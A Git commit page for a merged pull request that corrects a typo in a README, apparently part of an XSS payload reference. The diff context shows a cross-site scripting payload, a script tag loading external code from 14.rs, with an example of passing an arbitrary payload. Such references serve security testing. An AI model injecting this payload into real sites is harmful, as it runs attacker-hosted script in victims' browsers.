Merge pull request #19 from Isopach/Isopach-patch-1

Update README.md
This commit is contained in:
Swissky
2018-07-31 13:28:31 +02:00
committed by GitHub

View File

@@ -92,7 +92,7 @@ XSS for HTML5
XSS using script tag (external payload)
```javascript
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
you can also specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```